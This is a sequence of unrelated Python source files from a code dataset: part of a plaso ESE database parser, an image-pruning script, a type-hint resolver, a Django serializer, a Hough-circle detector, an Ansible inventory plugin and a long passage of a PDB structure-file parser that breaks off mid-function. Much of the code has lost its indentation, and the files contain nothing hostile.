DATA_FORMAT = 'Extensible Storage Engine (ESE) Database File (EDB) format'
_plugin_classes = {}
@classmethod
def GetFormatSpecification(cls):
"""Retrieves the format specification.
Returns:
FormatSpecification: format specification.
"""
format_specification = specification.FormatSpecification(cls.NAME)
format_specification.AddNewSignature(b'\xef\xcd\xab\x89', offset=4)
return format_specification
def ParseFileObject(self, parser_mediator, file_object):
"""Parses an ESE database file-like object.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): file-like object.
"""
database = ESEDatabase()
try:
database.Open(file_object)
except (IOError, ValueError) as exception:
parser_mediator.ProduceExtractionWarning(
'unable to open file with error: {0!s}'.format(exception))
return
# Compare the list of available plugin objects.
cache = ESEDBCache()
try:
for plugin in self._plugins:
if parser_mediator.abort:
break
file_entry = parser_mediator.GetFileEntry()
display_name = parser_mediator.GetDisplayName(file_entry)
if not plugin.CheckRequiredTables(database):
logger.debug('Skipped parsing file: {0:s} with plugin: {1:s}'.format(
display_name, plugin.NAME))
continue
logger.debug('Parsing file: {0:s} with plugin: {1:s}'.format(
display_name, plugin.NAME))
try:
plugin.UpdateChainAndProcess(
parser_mediator, cache=cache, database=database)
except Exception as exception: # pylint: disable=broad-except
parser_mediator.ProduceExtractionWarning((
'plugin: {0:s} unable to parse ESE database with error: '
'{1!s}').format(plugin.NAME, exception))
finally:
# TODO: explicitly clean up cache.
database.Close()
manager.ParsersManager.RegisterParser(ESEDBParser)
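# Hedged helper sketch (added, not part of plaso): a quick standalone check that
# mirrors GetFormatSpecification() above by looking for the ESE signature bytes at
# offset 4 of a raw file; illustrative only and not registered or used anywhere.
def _looks_like_esedb(path):
    with open(path, 'rb') as file_object:
        file_object.seek(4)
        return file_object.read(4) == b'\xef\xcd\xab\x89'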
|
StarcoderdataPython
|
1732819
|
import os
import glob
from PIL import Image
import numpy as np
import random
image_dir = "[DIRECTORY OF SCRAPED IMAGES]"
out_dir = "./out_pruned_images"
os.makedirs(out_dir, exist_ok=True)
filelist = glob.glob(os.path.join(image_dir, "*.png"))
random.shuffle(filelist)
uninteresting_count = 0
uninteresting_sat_stdevs = []
for i, image_path in enumerate(filelist):
pil_img = Image.open(image_path)
img = np.array(pil_img)
H, W, C = img.shape
sat_img = img[:, :W // 2, :]
map_img = img[:, W // 2:, :]
map_img_stdev = np.std(map_img.reshape((H * W // 2, C)), axis=0).mean()
if map_img_stdev < 1.0:
uninteresting_count += 1
sat_img_stdev = np.std(sat_img.reshape((H * W // 2, C)), axis=0).mean()
uninteresting_sat_stdevs.append(sat_img_stdev)
if sat_img_stdev < 30.0:
out_path = os.path.join(out_dir, os.path.basename(image_path))
pil_img.save(out_path)
print(out_path, i / len(filelist) * 100.0)
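# Added summary (assumption, not in the original script): report the counters that
# are accumulated above but never printed, once all files have been processed.
print('uninteresting map tiles:', uninteresting_count, 'of', len(filelist))
if uninteresting_sat_stdevs:
    print('mean satellite stdev of uninteresting tiles:', float(np.mean(uninteresting_sat_stdevs)))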
|
StarcoderdataPython
|
6571021
|
"""Resolve import locations and type hints."""
from functools import lru_cache
from importlib import import_module
from typing import Optional, Tuple, Any, Union
from ..parse import Name, NameBreak
def resolve_location(chain: Name) -> Optional[str]:
"""Find the final type that a name refers to."""
comps = []
for comp in chain.import_components:
if comp == NameBreak.call:
new = locate_type(tuple(comps))
if new is None:
return
comps = new.split('.')
else:
comps.append(comp)
return '.'.join(comps)
@lru_cache(maxsize=None)
def locate_type(components: Tuple[str]) -> Optional[str]:
"""Find type hint and resolve to new location."""
value, index = closest_module(components)
if index is None or index == len(components):
return
remaining = components[index:]
real_location = '.'.join(components[:index])
for i, component in enumerate(remaining):
value = getattr(value, component, None)
real_location += '.' + component
if value is None:
return
if isinstance(value, type):
# We don't differentiate between classmethods and ordinary methods,
# as we can't guarantee correct runtime behavior anyway.
real_location = fully_qualified_name(value)
# A possible function / method call needs to be last in the chain.
# Otherwise we might follow return types on function attribute access.
elif callable(value) and i == len(remaining) - 1:
annotations = getattr(value, '__annotations__', {})
ret_annotation = annotations.get('return', None)
# Inner type from typing.Optional (Union[T, None])
origin = getattr(ret_annotation, '__origin__', None)
args = getattr(ret_annotation, '__args__', None)
if origin is Union and len(args) == 2 and isinstance(None, args[1]):
ret_annotation = args[0]
if not ret_annotation or hasattr(ret_annotation, '__origin__'):
return
real_location = fully_qualified_name(ret_annotation)
return real_location
def fully_qualified_name(type_: type) -> str:
"""Construct the fully qualified name of a type."""
return getattr(type_, '__module__', '') + '.' + getattr(type_, '__qualname__', '')
@lru_cache(maxsize=None)
def closest_module(components: Tuple[str]) -> Tuple[Any, Optional[int]]:
"""Find closest importable module."""
mod = None
for i in range(1, len(components) + 1):
try:
mod = import_module('.'.join(components[:i]))
except ImportError:
break
else:
return None, None
return mod, i - 1
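# Hedged usage illustration (added comment, not part of the module; the relative
# import above means this file cannot be run directly): given an importable dotted
# prefix, e.g.
#   closest_module(('functools', 'lru_cache'))
# returns the functools module together with index 1, and locate_type() then walks
# the remaining attributes, following return-type annotations for a trailing call.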
|
StarcoderdataPython
|
11238972
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 23 16:36:03 2019
@author: yanik
"""
import cv2
from math import sqrt, pi, cos, sin
import numpy as np
image = cv2.imread("./Material/marker.png")
row, col, ch = image.shape
#Apply Gaussian Blur
blur = cv2.GaussianBlur(image,(5,5),0)
#Convert image to grayscale
blurgray = cv2.cvtColor(blur, cv2.COLOR_BGR2GRAY)
'''
#This part is written by using cv2's Hough method
d_length = int(((row**2 + col **2)**(1/2))/4)
#Apply Hough method
circles = cv2.HoughCircles(blurgray, cv2.HOUGH_GRADIENT, 1, 20, param1=50, param2=50,
minRadius=1, maxRadius=d_length)
#Displays circles
circles = np.uint16(np.around(circles))
for i in circles[0, :]:
center = (i[0], i[1])
# circle center
cv2.circle(image, center, 2, (0, 0, 255), 3)
# circle outline
radius = i[2]
cv2.circle(image, center, radius, (0, 255, 0), 3)
cv2.imshow("detected circles", image)
cv2.waitKey(0)
'''
#Find thresholds
max_treshold,image1 = cv2.threshold(blurgray,0,255,cv2.THRESH_BINARY + cv2.THRESH_OTSU)
low_treshold = max_treshold/3
#Apply canny operator
image2 = cv2.Canny(image1,low_treshold,max_treshold)
'''
cv2.imshow("canny", image2)
cv2.waitKey(0)
'''
#Create accumulator
A = np.zeros((row+10,col+10,30), dtype = np.float32)
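# Added note (illustrative comment, not in the original): every edge pixel (x, y)
# votes for all candidate centres a = x - r*cos(t), b = y - r*sin(t) over the tested
# radii, so maxima of the accumulator A correspond to likely circle centres and radii.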
for x in range(row):
for y in range(col):
if(image2[x,y] > 0):
for r in range(20, 30):
for t in range(360):
a = int(x-r * cos(t * (pi/180)))
b = int(y-r * sin(t * (pi/180)))
A[a][b][r] += 1
image3 = cv2.imread("./Material/marker.png")
for a in range(col):
for b in range(row):
for r in range(20, 30):
if (A[b][a][r] > 150):
cv2.circle(image3, (a,b), 2, (0, 0, 255), 3)
cv2.circle(image3, (a,b), r, (0, 255, 0), 3)
cv2.imshow("out", image3)
cv2.imwrite("part2.jpg", image3)
cv2.waitKey(0)
|
StarcoderdataPython
|
3561365
|
<reponame>nightlyds/library-basic-authentication-server<filename>order/serializers.py<gh_stars>0
from rest_framework import serializers
from .models import Order
class OrderSerializer(serializers.ModelSerializer):
class Meta:
model = Order
fields = ('id', 'user', 'book', 'created_at', 'end_at', 'plated_end_at')
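# Hedged usage note (added, not part of the original module): in a DRF view the
# serializer above would typically be used as, for example,
#   OrderSerializer(Order.objects.all(), many=True).data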
|
StarcoderdataPython
|
5037081
|
<filename>puzzle.ixtutorial/plugins/inventory/tutorial_inventory.py
# copyright, author, ...
DOCUMENTATION = '''
name: tutorial_inventory
plugin_type: inventory
short_description: generate random hostname
description:
    - A (useless) example inventory for our tutorial.
    - Creates an inventory with random hostnames.
    - Creates the group C(randomhosts).
    - Defines the variables C(foo) and C(bar).
options:
plugin:
description: Name of this plugin
required: True
num_hosts:
description: number of random hosts
required: True
name_len:
description: length of hostname (number of characters)
type: int
required: True
hostname_chars:
description: character used in random hostnames
required: True
type: string or list
'''
EXAMPLES = '''
plugin: puzzle.ixtutorial.tutorial_inventory
num_hosts: 10
name_len: 5
hostname_chars: abcdefghijkxyz
'''
from ansible.plugins.inventory import BaseInventoryPlugin
import random
import os
class InventoryModule(BaseInventoryPlugin):
NAME = 'tutorial_inventory'
def __init__(self):
super(InventoryModule, self).__init__()
def verify_file(self, path):
''' verify the inventory file '''
return os.path.exists(path)
def parse(self, inventory, loader, path, cache=False):
''' parse the inventory file '''
super(InventoryModule, self).parse(inventory,
loader,
path,
cache=cache)
config = self._read_config_data(path)
grp_all = inventory.groups['all']
grp_all.set_variable('foo', 'testval1')
inventory.add_group('randomhosts')
grp_randomhosts = inventory.groups['randomhosts']
grp_randomhosts.set_variable('bar', 'testval2')
for _ in range(config['num_hosts']):
rand_host = ''.join(
random.choice(config['hostname_chars'])
for _ in range(config['name_len']))
inventory.add_host(rand_host)
inventory.add_child('randomhosts', rand_host)
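# Hedged usage note (added comment, not part of the plugin): with the EXAMPLES
# document above saved as e.g. tutorial_inventory.yml and the collection installed,
# the generated hosts can be inspected with
#   ansible-inventory -i tutorial_inventory.yml --list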
|
StarcoderdataPython
|
152669
|
<gh_stars>0
class AuthFailed(Exception):
pass
class SearchFailed(Exception):
pass
|
StarcoderdataPython
|
3512310
|
<reponame>Kortemme-Lab/covariation<filename>analysis/utils/pdb.py<gh_stars>1-10
#!/usr/bin/env python2
# encoding: utf-8
# The MIT License (MIT)
#
# Copyright (c) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import re
import sys
import os
import types
import string
from basics import Residue, PDBResidue, Sequence, SequenceMap, residue_type_3to1_map, protonated_residue_type_3to1_map, non_canonical_amino_acids, protonated_residues_types_3, residue_types_3, Mutation, ChainMutation, SimpleMutation
from basics import dna_nucleotides, rna_nucleotides, dna_nucleotides_3to1_map, dna_nucleotides_2to1_map, non_canonical_dna, non_canonical_rna, all_recognized_dna, all_recognized_rna
from fsio import read_file, write_file
### Residue types
allowed_PDB_residues_types = protonated_residues_types_3.union(residue_types_3)
allowed_PDB_residues_and_nucleotides = allowed_PDB_residues_types.union(dna_nucleotides).union(rna_nucleotides)
### Parsing-related variables
COMPND_field_map = {
'MOL_ID' : 'MoleculeID',
'MOLECULE' : 'Name',
'CHAIN' : 'Chains',
'FRAGMENT' : 'Fragment',
'SYNONYM' : 'Synonym',
'EC' : 'EC',
'ENGINEERED' : 'Engineered',
'MUTATION' : 'Mutation',
'OTHER_DETAILS' : 'OtherDetails',
}
SOURCE_field_map = {
'MOL_ID' : 'MoleculeID',
'SYNTHETIC' : 'Synthetic',
'ORGANISM_SCIENTIFIC' : 'OrganismScientificName',
'ORGANISM_COMMON' : 'OrganismCommonName',
'ORGANISM_TAXID' : 'OrganismNCBITaxonomyID',
}
modified_residues_patch = {
'1A2C' : {
'34H' : 'UNK',
},
'2ATC' : {
'ASX' : 'ASN',
},
'1XY1' : {
'MPT' : 'UNK',
},
'1CVW' : { # Note: more recent versions of this file do not require this patch
'ANS' : 'UNK',
'0QE' : 'UNK',
},
'1FAK' : {
'CGU' : 'GLU', # Gamma-carboxy-glutamic acid
},
'1JXQ' : {
'PHQ' : 'UNK', # benzyl chlorocarbonate
'CF0' : 'UNK', # fluoromethane
},
'1YJ1' : {
'DGN' : 'GLN', # D-glutamine
},
'2CN0' : {
'SIN' : 'UNK', # Succinic acid
},
'2FTL' : {
'IAS' : 'ASP', # Beta-L-aspartic acid/L-isoaspartate. Mismatch to asparagine - "the expected l-Asn residue had been replaced with a non-standard amino acid" (10.1016/j.jmb.2006.11.003).
},
}
### Record types
order_of_records = [
"HEADER","OBSLTE","TITLE","SPLIT","CAVEAT","COMPND","SOURCE","KEYWDS",
"EXPDTA","NUMMDL","MDLTYP","AUTHOR","REVDAT","SPRSDE","JRNL","REMARK",
"DBREF","DBREF1","DBREF2","DBREF1/DBREF2","SEQADV","SEQRES","MODRES",
"HET","HETNAM","HETSYN","FORMUL","HELIX","SHEET","SSBOND","LINK","CISPEP",
"SITE","CRYST1","ORIGX1","ORIGX2","ORIGX3","SCALE1","SCALE2","SCALE3",
"MTRIX1","MTRIX2","MTRIX3","MODEL","ATOM","ANISOU","TER","HETATM",
"ENDMDL","CONECT","MASTER","END"
]
order_of_records = [x.ljust(6) for x in order_of_records]
allowed_record_types = set([
# One time, single line:
'CRYST1', # Unit cell parameters, space group, and Z.
'END ', # Last record in the file.
'HEADER', # First line of the entry, contains PDB ID code, classification, and date of deposition.
'NUMMDL', # Number of models.
'MASTER', # Control record for bookkeeping.
'ORIGXn', # Transformation from orthogonal coordinates to the submitted coordinates (n = 1, 2, or 3).
'SCALEn', # Transformation from orthogonal coordinates to fractional crystallographic coordinates (n = 1, 2, or 3).
# One time, multiple lines:
'AUTHOR', # List of contributors.
'CAVEAT', # Severe error indicator.
'COMPND', # Description of macromolecular contents of the entry.
'EXPDTA', # Experimental technique used for the structure determination.
'MDLTYP', # Contains additional annotation pertinent to the coordinates presented in the entry.
'KEYWDS', # List of keywords describing the macromolecule.
'OBSLTE', # Statement that the entry has been removed from distribution and list of the ID code(s) which replaced it.
'SOURCE', # Biological source of macromolecules in the entry.
'SPLIT ', # List of PDB entries that compose a larger macromolecular complexes.
'SPRSDE', # List of entries obsoleted from public release and replaced by current entry.
'TITLE ', # Description of the experiment represented in the entry.
# Multiple times, one line:
'ANISOU', # Anisotropic temperature factors.
'ATOM ', # Atomic coordinate records for standard groups.
'CISPEP', # Identification of peptide residues in cis conformation.
'CONECT', # Connectivity records.
'DBREF ', # Reference to the entry in the sequence database(s).
'HELIX ', # Identification of helical substructures.
'HET ', # Identification of non-standard groups heterogens).
'HETATM', # Atomic coordinate records for heterogens.
'LINK ', # Identification of inter-residue bonds.
'MODRES', # Identification of modifications to standard residues.
'MTRIXn', # Transformations expressing non-crystallographic symmetry (n = 1, 2, or 3). There may be multiple sets of these records.
'REVDAT', # Revision date and related information.
'SEQADV', # Identification of conflicts between PDB and the named sequence database.
'SHEET ', # Identification of sheet substructures.
'SSBOND', # Identification of disulfide bonds.
# Multiple times, multiple lines:
'FORMUL', # Chemical formula of non-standard groups.
'HETNAM', # Compound name of the heterogens.
'HETSYN', # Synonymous compound names for heterogens.
'SEQRES', # Primary sequence of backbone residues.
'SITE ', # Identification of groups comprising important entity sites.
# Grouping:
'ENDMDL', # End-of-model record for multiple structures in a single coordinate entry.
'MODEL ', # Specification of model number for multiple structures in a single coordinate entry.
'TER ', # Chain terminator.
# Other:
'JRNL ', # Literature citation that defines the coordinate set.
'REMARK', # General remarks; they can be structured or free form.
])
# This set is probably safer to use to allow backwards compatibility
all_record_types = allowed_record_types.union(set(order_of_records))
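# Added note (illustrative comment, not in the original): the parser below relies on
# the fixed-column PDB layout, e.g. in an ATOM/HETATM record the residue name sits in
# columns 18-20 (line[17:20]) and the chain identifier in column 22 (line[21]).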
### Exception classes
class PDBParsingException(Exception): pass
class MissingRecordsException(Exception): pass
class NonCanonicalResidueException(Exception): pass
class PDBValidationException(Exception): pass
class PDBMissingMainchainAtomsException(Exception): pass
class PDB:
"""A class to store and manipulate PDB data"""
### Constructor ###
def __init__(self, pdb_content, pdb_id = None, strict = True):
'''Takes either a pdb file, a list of strings = lines of a pdb file, or another object.'''
self.pdb_content = pdb_content
if type(pdb_content) is types.StringType:
self.lines = pdb_content.split("\n")
else:
self.lines = [line.strip() for line in pdb_content]
self.parsed_lines = {}
self.structure_lines = [] # For ATOM and HETATM records
self.journal = None
self.chain_types = {}
self.format_version = None
self.modified_residues = None
self.modified_residue_mapping_3 = {}
self.pdb_id = None
self.strict = strict
self.seqres_chain_order = [] # A list of the PDB chains in document-order of SEQRES records
self.seqres_sequences = {} # A dict mapping chain IDs to SEQRES Sequence objects
self.atom_chain_order = [] # A list of the PDB chains in document-order of ATOM records (not necessarily the same as seqres_chain_order)
self.atom_sequences = {} # A dict mapping chain IDs to ATOM Sequence objects
self.chain_atoms = {} # A dict mapping chain IDs to a set of ATOM types. This is useful to test whether some chains only have CA entries e.g. in 1LRP, 1AIN, 1C53, 1HIO, 1XAS, 2TMA
# PDB deprecation fields
self.deprecation_date = None
self.deprecated = False
self.replacement_pdb_id = None
self.rosetta_to_atom_sequence_maps = {}
self.rosetta_residues = []
self.residue_types = set() # the set of 3-letter residue types present in the file (useful for checking against e.g. CSE, MSE)
self.fix_pdb()
self._split_lines()
self.pdb_id = pdb_id
self.pdb_id = self.get_pdb_id() # parse the PDB ID if it is not passed in
self._get_pdb_format_version()
self._get_modified_residues()
self._get_replacement_pdb_id()
self._get_SEQRES_sequences()
self._get_ATOM_sequences()
def fix_pdb(self):
'''A function to fix fatal errors in PDB files when they can be automatically fixed. At present, this only runs if
self.strict is False. We may want a separate property for this since we may want to keep strict mode but still
allow PDBs to be fixed.
The only fixes at the moment are for missing chain IDs which get filled in with a valid PDB ID, if possible.'''
if self.strict:
return
# Get the list of chains
chains = set()
for l in self.lines:
if l.startswith('ATOM ') or l.startswith('HETATM'):
chains.add(l[21])
# If there is a chain with a blank ID, change that ID to a valid unused ID
if ' ' in chains:
fresh_id = None
allowed_chain_ids = list(string.uppercase) + list(string.lowercase) + map(str, range(10))
for c in chains:
try: allowed_chain_ids.remove(c)
except: pass
if allowed_chain_ids:
fresh_id = allowed_chain_ids[0]
# Rewrite the lines
new_lines = []
if fresh_id:
for l in self.lines:
if (l.startswith('ATOM ') or l.startswith('HETATM')) and l[21] == ' ':
new_lines.append('%s%s%s' % (l[:21], fresh_id, l[22:]))
else:
new_lines.append(l)
self.lines = new_lines
### Class functions ###
@staticmethod
def from_filepath(filepath, strict = True):
'''A function to replace the old constructor call where a filename was passed in.'''
return PDB(read_file(filepath), strict = strict)
@staticmethod
def from_lines(pdb_file_lines, strict = True):
'''A function to replace the old constructor call where a list of the file's lines was passed in.'''
return PDB("\n".join(pdb_file_lines), strict = strict)
### Private functions ###
def _split_lines(self):
'''Creates the parsed_lines dict which keeps all record data in document order indexed by the record type.'''
parsed_lines = {}
for rt in all_record_types:
parsed_lines[rt] = []
parsed_lines[0] = []
for line in self.lines:
linetype = line[0:6]
if linetype in all_record_types:
parsed_lines[linetype].append(line)
else:
parsed_lines[0].append(line)
self.parsed_lines = parsed_lines
self._update_structure_lines() # This does a second loop through the lines. We could do this logic above but I prefer a little performance hit for the cleaner code
def _update_structure_lines(self):
'''ATOM and HETATM lines may be altered by function calls. When this happens, this function should be called to keep self.structure_lines up to date.'''
structure_lines = []
atom_chain_order = []
chain_atoms = {}
for line in self.lines:
linetype = line[0:6]
if linetype == 'ATOM ' or linetype == 'HETATM' or linetype == 'TER ':
chain_id = line[21]
self.residue_types.add(line[17:20].strip())
structure_lines.append(line)
if (chain_id not in atom_chain_order) and (chain_id != ' '):
atom_chain_order.append(chain_id)
if linetype == 'ATOM ':
atom_type = line[12:16].strip()
if atom_type:
chain_atoms[chain_id] = chain_atoms.get(chain_id, set())
chain_atoms[chain_id].add(atom_type)
if linetype == 'ENDMDL':
break
self.structure_lines = structure_lines
self.atom_chain_order = atom_chain_order
self.chain_atoms = chain_atoms
### Basic functions ###
def clone(self):
'''A function to replace the old constructor call where a PDB object was passed in and 'cloned'.'''
return PDB("\n".join(self.lines), pdb_id = self.pdb_id, strict = self.strict)
def get_content(self):
'''A function to replace the old constructor call where a PDB object was passed in and 'cloned'.'''
return '\n'.join(self.lines)
def write(self, pdbpath, separator = '\n'):
write_file(pdbpath, separator.join(self.lines))
def get_pdb_id(self):
'''Return the PDB ID. If one was passed in to the constructor, this takes precedence, otherwise the header is
parsed to try to find an ID. The header does not always contain a PDB ID in regular PDB files and appears to
always have an ID of 'XXXX' in biological units so the constructor override is useful.'''
if self.pdb_id:
return self.pdb_id
else:
header = self.parsed_lines["HEADER"]
assert(len(header) <= 1)
if header:
self.pdb_id = header[0][62:66]
return self.pdb_id
return None
def get_ATOM_and_HETATM_chains(self):
'''todo: remove this function as it now just returns a member element'''
return self.atom_chain_order
def get_annotated_chain_sequence_string(self, chain_id, use_seqres_sequences_if_possible, raise_Exception_if_not_found = True):
'''A helper function to return the Sequence for a chain. If use_seqres_sequences_if_possible then we return the SEQRES
Sequence if it exists. We return a tuple of values, the first identifying which sequence was returned.'''
if use_seqres_sequences_if_possible and self.seqres_sequences and self.seqres_sequences.get(chain_id):
return ('SEQRES', self.seqres_sequences[chain_id])
elif self.atom_sequences.get(chain_id):
return ('ATOM', self.atom_sequences[chain_id])
elif raise_Exception_if_not_found:
raise Exception('Error: Chain %s expected but not found.' % (str(chain_id)))
else:
return None
def get_chain_sequence_string(self, chain_id, use_seqres_sequences_if_possible, raise_Exception_if_not_found = True):
'''Similar to get_annotated_chain_sequence_string except that we only return the Sequence and do not state which sequence it was.'''
chain_pair = self.get_annotated_chain_sequence_string(chain_id, use_seqres_sequences_if_possible, raise_Exception_if_not_found = raise_Exception_if_not_found)
if chain_pair:
return chain_pair[1]
return None
def _get_modified_residues(self):
if not self.modified_residues:
modified_residues = {}
modified_residue_mapping_3 = {}
# Add in the patch
for k, v in modified_residues_patch.get(self.pdb_id, {}).iteritems():
modified_residue_mapping_3[k] = v
for line in self.parsed_lines["MODRES"]:
restype = line[24:27].strip()
restype_1 = residue_type_3to1_map.get(restype) or dna_nucleotides_2to1_map.get(restype)
if not restype_1:
assert(restype in rna_nucleotides)
restype_1 = restype
modified_residues["%s%s" % (line[16], line[18:23])] = {'modified_residue' : line[12:15], 'original_residue_3' : restype, 'original_residue_1' : restype_1}
modified_residue_mapping_3[line[12:15]] = restype
self.modified_residue_mapping_3 = modified_residue_mapping_3
self.modified_residues = modified_residues
def _get_replacement_pdb_id(self):
'''Checks to see if the PDB file has been deprecated and, if so, what the new ID is.'''
deprecation_lines = self.parsed_lines['OBSLTE']
date_regex = re.compile('(\d+)-(\w{3})-(\d+)')
if deprecation_lines:
assert(len(deprecation_lines) == 1)
tokens = deprecation_lines[0].split()[1:]
assert(len(tokens) == 3)
if self.pdb_id:
mtchs = date_regex.match(tokens[0])
assert(mtchs)
_day = int(mtchs.group(1))
_month = mtchs.group(2)
_year = int(mtchs.group(3)) # only two characters?
assert(tokens[1] == self.pdb_id)
self.deprecation_date = (_day, _month, _year) # no need to do anything fancier unless this is ever needed
self.deprecated = True
if len(tokens) == 3:
assert(len(tokens[2]) == 4)
self.replacement_pdb_id = tokens[2]
### PDB mutating functions ###
def strip_to_chains(self, chains, break_at_endmdl = True):
'''Throw away all ATOM/HETATM/ANISOU/TER lines for chains that are not in the chains list.'''
if chains:
chains = set(chains)
# Remove any structure lines not associated with the chains
self.lines = [l for l in self.lines if not(l.startswith('ATOM ') or l.startswith('HETATM') or l.startswith('ANISOU') or l.startswith('TER')) or l[21] in chains]
# For some Rosetta protocols, only one NMR model should be kept
if break_at_endmdl:
new_lines = []
for l in self.lines:
if l.startswith('ENDMDL'):
new_lines.append(l)
break
new_lines.append(l)
self.lines = new_lines
self._update_structure_lines()
# todo: this logic should be fine if no other member elements rely on these lines e.g. residue mappings otherwise we need to update or clear those elements here
else:
raise Exception('The chains argument needs to be supplied.')
def strip_HETATMs(self, only_strip_these_chains = []):
'''Throw away all HETATM lines. If only_strip_these_chains is specified then only strip HETATMs lines for those chains.'''
if only_strip_these_chains:
self.lines = [l for l in self.lines if not(l.startswith('HETATM')) or l[21] not in only_strip_these_chains]
else:
self.lines = [l for l in self.lines if not(l.startswith('HETATM'))]
self._update_structure_lines()
# todo: this logic should be fine if no other member elements rely on these lines e.g. residue mappings otherwise we need to update those elements here
def generate_all_point_mutations_for_chain(self, chain_id):
mutations = []
if self.atom_sequences.get(chain_id):
aas = sorted(residue_type_3to1_map.values())
aas.remove('X')
seq = self.atom_sequences[chain_id]
for res_id in seq.order:
r = seq.sequence[res_id]
assert(chain_id == r.Chain)
for mut_aa in aas:
if mut_aa != r.ResidueAA:
mutations.append(ChainMutation(r.ResidueAA, r.ResidueID, mut_aa, Chain = chain_id))
return mutations
### FASTA functions ###
def create_fasta(self, length = 80, prefer_seqres_order = True):
fasta_string = ''
if prefer_seqres_order:
chain_order, sequences = self.seqres_chain_order or self.atom_chain_order, self.seqres_sequences or self.atom_sequences
else:
chain_order, sequences = self.atom_chain_order or self.seqres_chain_order, self.atom_sequences or self.seqres_sequences
for c in chain_order:
if c not in sequences:
continue
fasta_string += '>%s|%s|PDBID|CHAIN|SEQUENCE\n' % (self.pdb_id, c)
seq = str(sequences[c])
for line in [seq[x:x+length] for x in xrange(0, len(seq), length)]:
fasta_string += line + '\n'
return fasta_string
### PDB file parsing functions ###
def _get_pdb_format_version(self):
'''Remark 4 indicates the version of the PDB File Format used to generate the file.'''
if not self.format_version:
version = None
version_lines = None
try:
version_lines = [line for line in self.parsed_lines['REMARK'] if int(line[7:10]) == 4 and line[10:].strip()]
except: pass
if version_lines:
assert(len(version_lines) == 1)
version_line = version_lines[0]
version_regex = re.compile('.*?FORMAT V.(.*),')
mtch = version_regex.match(version_line)
if mtch and mtch.groups(0):
try:
version = float(mtch.groups(0)[0])
except:
pass
self.format_version = version
def get_resolution(self):
resolution = None
resolution_lines_exist = False
for line in self.parsed_lines["REMARK"]:
if line[9] == "2" and line[11:22] == "RESOLUTION.":
#if id == :
# line = "REMARK 2 RESOLUTION. 3.00 ANGSTROMS.
# This code SHOULD work but there are badly formatted PDBs in the RCSB database.
# e.g. "1GTX"
#if line[31:41] == "ANGSTROMS.":
# try:
# resolution = float(line[23:30])
# except:
# raise Exception("Error parsing PDB file to determine resolution. The resolution line\n '%s'\ndoes not match the PDB standard. Expected data for diffraction experiments." % line )
#if line[23:38] == "NOT APPLICABLE.":
# resolution = "N/A"
#else:
# raise Exception("Error parsing PDB file to determine resolution. The resolution line\n '%s'\ndoes not match the PDB standard." % line )
#
# Instead, we use the code below:
if resolution:
raise Exception("Found multiple RESOLUTION lines.")
resolution_lines_exist = True
strippedline = line[22:].strip()
Aindex = strippedline.find("ANGSTROMS.")
if strippedline == "NOT APPLICABLE.":
resolution = "N/A"
elif Aindex != -1 and strippedline.endswith("ANGSTROMS."):
if strippedline[:Aindex].strip() == "NULL":
resolution = "N/A" # Yes, yes, yes, I know. Look at 1WSY.pdb.
else:
try:
resolution = float(strippedline[:Aindex].strip())
except:
raise PDBParsingException("Error parsing PDB file to determine resolution. The resolution line\n '%s'\ndoes not match the PDB standard. Expected data for diffraction experiments." % line )
else:
raise PDBParsingException("Error parsing PDB file to determine resolution. The resolution line\n '%s'\ndoes not match the PDB standard." % line )
if resolution_lines_exist and not resolution:
raise PDBParsingException("Could not determine resolution.")
return resolution
def get_title(self):
if self.parsed_lines.get("TITLE "):
return " ".join([line[10:80].strip() for line in self.parsed_lines["TITLE "] if line[10:80].strip()])
return None
def get_techniques(self):
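        '''Returns the experimental techniques listed in the EXPDTA records as a semi-colon-separated string, or None if there are no EXPDTA records.'''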
techniques = None
technique_lines_exist = False
for line in self.parsed_lines["EXPDTA"]:
technique_lines_exist = True
techniques = line[10:71].split(";")
for k in range(len(techniques)):
techniques[k] = techniques[k].strip()
techniques = ";".join(techniques)
if technique_lines_exist and not techniques:
raise PDBParsingException("Could not determine techniques used.")
return techniques
def get_UniProt_ACs(self):
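        '''Returns the list of UniProt accession numbers referenced by the DBREF records of this PDB file.'''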
return [v['dbAccession'] for k, v in self.get_DB_references().get(self.pdb_id, {}).get('UNIPROT', {}).iteritems()]
def get_DB_references(self):
''' "The DBREF record provides cross-reference links between PDB sequences (what appears in SEQRES record) and
a corresponding database sequence." - http://www.wwpdb.org/documentation/format33/sect3.html#DBREF
'''
_database_names = {
'GB' : 'GenBank',
'PDB' : 'Protein Data Bank',
'UNP' : 'UNIPROT',
'NORINE': 'Norine',
'TREMBL': 'UNIPROT',
}
DBref = {}
for l in self.parsed_lines["DBREF "]: # [l for l in self.lines if l.startswith('DBREF')]
pdb_id = l[7:11]
chain_id = l[12]
seqBegin = int(l[14:18])
insertBegin = l[18]
seqEnd = int(l[20:24])
insertEnd = l[24]
database = _database_names[l[26:32].strip()]
dbAccession = l[33:41].strip()
dbIdCode = l[42:54].strip()
dbseqBegin = int(l[55:60])
idbnsBeg = l[60]
dbseqEnd = int(l[62:67])
dbinsEnd = l[67]
DBref[pdb_id] = DBref.get(pdb_id, {})
DBref[pdb_id][database] = DBref[pdb_id].get(database, {})
if DBref[pdb_id][database].get(chain_id):
if not(DBref[pdb_id][database][chain_id]['dbAccession'] == dbAccession and DBref[pdb_id][database][chain_id]['dbIdCode'] == dbIdCode):
raise PDBParsingException('This code needs to be generalized. dbIdCode should really be a list to handle chimera cases.')
else:
